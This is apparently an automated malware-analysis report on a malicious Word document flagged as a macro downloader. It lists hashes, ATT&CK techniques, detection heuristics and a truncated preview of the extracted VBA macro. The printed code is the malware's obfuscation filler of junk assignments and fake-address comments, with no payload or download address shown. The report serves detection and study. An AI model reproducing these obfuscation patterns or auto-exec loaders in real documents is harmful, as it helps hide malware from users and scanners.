Office (OLE) malware analysis — malicious · 1890f1cf7ef183cd

MALICIOUS

Office (OLE)

281.5 KB Created: 2019-10-11 06:46:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: 639efc02c91bdd97576fa622da9b0f13 SHA-1: ea7eacd47862d74d59c61218f03c3efbb8ad4bce SHA-256: 1890f1cf7ef183cdbe29746f03497b10620876cac3bbc2cb7ff87a7cc59d66cb

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains obfuscated VBA macros, including an AutoOpen function, which are designed to execute automatically upon opening. Heuristics indicate the use of GetObject and execution tokens, suggesting the macro attempts to download and run a secondary payload. ClamAV detection further confirms its malicious nature as a downloader.

Heuristics 8

ClamAV: Doc.Downloader.Generic-7329510-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-7329510-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 83032 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	83032 bytes
SHA-256: `034a7563a4e4bc0cbe6d2c987c433feef4fa201264df6db6485df67c848d127c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "c0700907660" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "b19x7x45090, 0, 0, MSForms, TextBox" Attribute VB_Control = "b06281x0603, 1, 1, MSForms, TextBox" Attribute VB_Control = "x0c80941695x, 2, 2, MSForms, TextBox" Attribute VB_Control = "x860052b300, 3, 3, MSForms, TextBox" Attribute VB_Control = "cx0102cb058, 4, 4, MSForms, TextBox" Attribute VB_Control = "c3007b6403930, 5, 5, MSForms, TextBox" Attribute VB_Name = "b270861x0570" Function cb123x4531b7() On Error Resume Next 'Future082 Legros Coves, Altatown, New Caledonia Central726 Kertzmann Trail, Lake Weldon, Nauru c40604669229 = Rnd(c0203c2xb705 * ChrB(434)) + Log(233) 'Customer3843 O'Conner Track, Jodyhaven, Pitcairn Islands Regional29224 Parker Via, North Estefania, Norway b29b03045070 = Rnd(c3438728x510 * ChrB(404)) + Log(453) 'Investor14301 Upton Parks, Ovashire, Nauru Corporate3810 Gerardo Fall, New Keven, Christmas Island x36270c561996 = Rnd(x140019c8012 * ChrB(218)) + Log(862) 'Central858 Chris Track, Connellyberg, Macao Chief6017 Jackie View, Whiteview, French Southern Territories x0110bc4234 = Rnd(c170b0191004 * ChrB(321)) + Log(585) 'Legacy3963 Walker Pine, Leanneland, Seychelles Investor3367 Carson Rapids, Quigleyside, Brunei Darussalam x05484c23666 = Rnd(c0b45000b0c * ChrB(181)) + Log(626) 'Product062 Michelle Park, East Lilyan, Congo Lead84818 Stehr Stream, Sauerside, Kiribati bxb103506000 = Rnd(b0x36900296 * ChrB(713)) + Log(6) 'Product6945 Mazie Expressway, Lockmanmouth, United States Minor Outlying Islands Direct440 Kuhlman Isle, Port Akeemfurt, Republic of Korea c206230721291 = Rnd(xbc8774xx687 * ChrB(578)) + Log(902) 'Customer34809 O'Keefe Path, West Sethchester, Cape Verde Principal02250 Rau Burg, Romagueramouth, Greece 'International98166 Evalyn Flats, Lake Lilla, Kyrgyz Republic Lead817 Brakus Place, Andreannetown, Nicaragua c390508028407 = Rnd(c82075c602222 * ChrB(646)) + Log(356) 'Direct2424 Gutkowski Radial, Port Agnes, Honduras Principal85418 Emard Plaza, Lake Paula, Guinea-Bissau b040607090860 = Rnd(cxc32038027 * ChrB(694)) + Log(426) 'District51991 Eloy Spring, Port Patience, British Indian Ocean Territory (Chagos Archipelago) Regional67848 Thaddeus Forks, Carrollborough, Syrian Arab Republic c164x3x86990c = Rnd(x004b972b05b * ChrB(192)) + Log(567) 'Internal0776 Pink Oval, Lake Brenden, Saudi Arabia Senior835 Gusikowski Shoals, Breitenbergchester, Burkina Faso b70b0b64265 = Rnd(x256bb980319 * ChrB(125)) + Log(430) 'District0129 Haley Spur, Zboncakmouth, Ethiopia Future9710 Lang Orchard, Strackestad, Antarctica (the territory South of 60 deg S) c457196xb09 = Rnd(x78407c40833x * ChrB(376)) + Log(388) 'Global6924 Anissa Lakes, Wizaton, Pakistan Human599 Renner Manor, New Cierra, Cayman Islands b2930x600019 = Rnd(x90038x202b * ChrB(630)) + Log(220) 'Dynamic0673 Karson Divide, Walterland, Namibia Future39801 Lesch Meadows, North Howellmouth, Malaysia c0c11cb50x479 = Rnd(c580c2006790 * ChrB(707)) + Log(398) 'Dynamic714 Zoey Light, Altenwerthton, Bhutan Chief878 Stracke Inlet, New Russmouth, Palau 'District2140 Leonel Circle, Morarfort, Iceland Lead992 Darrick Station, Duaneton, Pitcairn Islands c860x07064b = Rnd(c00000461673 * ChrB(907)) + Log(54) 'Forward7390 Green Forges, Jacobsshire, Taiwan Forward477 Friesen Mountains, East Lilliana, United Arab Emirates b800b030590c0 = Rnd(c90x30c06bc * ChrB(286)) + Log(65) 'International347 Roberts Mount, Port Jessborough, Austria Senior91358 Bode Ford, South Ebonytown, Palau bb048103660b = Rnd(bb080011003b0 * ChrB(25)) + Log(543) 'Lead010 Alexander Turnpike, Nienowview, Azerbaijan Global66413 Kub Island, Manteton, Guyana b005923065050 = Rnd(c0xb9074c34 * ChrB(610)) + Log(657) 'Principal097 Gustave Causeway, North Caspershire, Timor-Leste Human6610 Bradtke Stravenue, Hellertown, Montse ... (truncated)

SHA-256: 034a7563a4e4bc0cbe6d2c987c433feef4fa201264df6db6485df67c848d127c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "c0700907660"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "b19x7x45090, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b06281x0603, 1, 1, MSForms, TextBox"
Attribute VB_Control = "x0c80941695x, 2, 2, MSForms, TextBox"
Attribute VB_Control = "x860052b300, 3, 3, MSForms, TextBox"
Attribute VB_Control = "cx0102cb058, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c3007b6403930, 5, 5, MSForms, TextBox"

Attribute VB_Name = "b270861x0570"
Function cb123x4531b7()
On Error Resume Next
   'Future082 Legros Coves, Altatown, New Caledonia Central726 Kertzmann Trail, Lake Weldon, Nauru
c40604669229 = Rnd(c0203c2xb705 * ChrB(434)) + Log(233)
'Customer3843 O'Conner Track, Jodyhaven, Pitcairn Islands Regional29224 Parker Via, North Estefania, Norway
b29b03045070 = Rnd(c3438728x510 * ChrB(404)) + Log(453)
'Investor14301 Upton Parks, Ovashire, Nauru Corporate3810 Gerardo Fall, New Keven, Christmas Island
x36270c561996 = Rnd(x140019c8012 * ChrB(218)) + Log(862)
'Central858 Chris Track, Connellyberg, Macao Chief6017 Jackie View, Whiteview, French Southern Territories
x0110bc4234 = Rnd(c170b0191004 * ChrB(321)) + Log(585)
'Legacy3963 Walker Pine, Leanneland, Seychelles Investor3367 Carson Rapids, Quigleyside, Brunei Darussalam
x05484c23666 = Rnd(c0b45000b0c * ChrB(181)) + Log(626)
'Product062 Michelle Park, East Lilyan, Congo Lead84818 Stehr Stream, Sauerside, Kiribati
bxb103506000 = Rnd(b0x36900296 * ChrB(713)) + Log(6)
'Product6945 Mazie Expressway, Lockmanmouth, United States Minor Outlying Islands Direct440 Kuhlman Isle, Port Akeemfurt, Republic of Korea
c206230721291 = Rnd(xbc8774xx687 * ChrB(578)) + Log(902)
'Customer34809 O'Keefe Path, West Sethchester, Cape Verde Principal02250 Rau Burg, Romagueramouth, Greece
'International98166 Evalyn Flats, Lake Lilla, Kyrgyz Republic Lead817 Brakus Place, Andreannetown, Nicaragua
c390508028407 = Rnd(c82075c602222 * ChrB(646)) + Log(356)
'Direct2424 Gutkowski Radial, Port Agnes, Honduras Principal85418 Emard Plaza, Lake Paula, Guinea-Bissau
b040607090860 = Rnd(cxc32038027 * ChrB(694)) + Log(426)
'District51991 Eloy Spring, Port Patience, British Indian Ocean Territory (Chagos Archipelago) Regional67848 Thaddeus Forks, Carrollborough, Syrian Arab Republic
c164x3x86990c = Rnd(x004b972b05b * ChrB(192)) + Log(567)
'Internal0776 Pink Oval, Lake Brenden, Saudi Arabia Senior835 Gusikowski Shoals, Breitenbergchester, Burkina Faso
b70b0b64265 = Rnd(x256bb980319 * ChrB(125)) + Log(430)
'District0129 Haley Spur, Zboncakmouth, Ethiopia Future9710 Lang Orchard, Strackestad, Antarctica (the territory South of 60 deg S)
c457196xb09 = Rnd(x78407c40833x * ChrB(376)) + Log(388)
'Global6924 Anissa Lakes, Wizaton, Pakistan Human599 Renner Manor, New Cierra, Cayman Islands
b2930x600019 = Rnd(x90038x202b * ChrB(630)) + Log(220)
'Dynamic0673 Karson Divide, Walterland, Namibia Future39801 Lesch Meadows, North Howellmouth, Malaysia
c0c11cb50x479 = Rnd(c580c2006790 * ChrB(707)) + Log(398)
'Dynamic714 Zoey Light, Altenwerthton, Bhutan Chief878 Stracke Inlet, New Russmouth, Palau
   'District2140 Leonel Circle, Morarfort, Iceland Lead992 Darrick Station, Duaneton, Pitcairn Islands
c860x07064b = Rnd(c00000461673 * ChrB(907)) + Log(54)
'Forward7390 Green Forges, Jacobsshire, Taiwan Forward477 Friesen Mountains, East Lilliana, United Arab Emirates
b800b030590c0 = Rnd(c90x30c06bc * ChrB(286)) + Log(65)
'International347 Roberts Mount, Port Jessborough, Austria Senior91358 Bode Ford, South Ebonytown, Palau
bb048103660b = Rnd(bb080011003b0 * ChrB(25)) + Log(543)
'Lead010 Alexander Turnpike, Nienowview, Azerbaijan Global66413 Kub Island, Manteton, Guyana
b005923065050 = Rnd(c0xb9074c34 * ChrB(610)) + Log(657)
'Principal097 Gustave Causeway, North Caspershire, Timor-Leste Human6610 Bradtke Stravenue, Hellertown, Montse
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.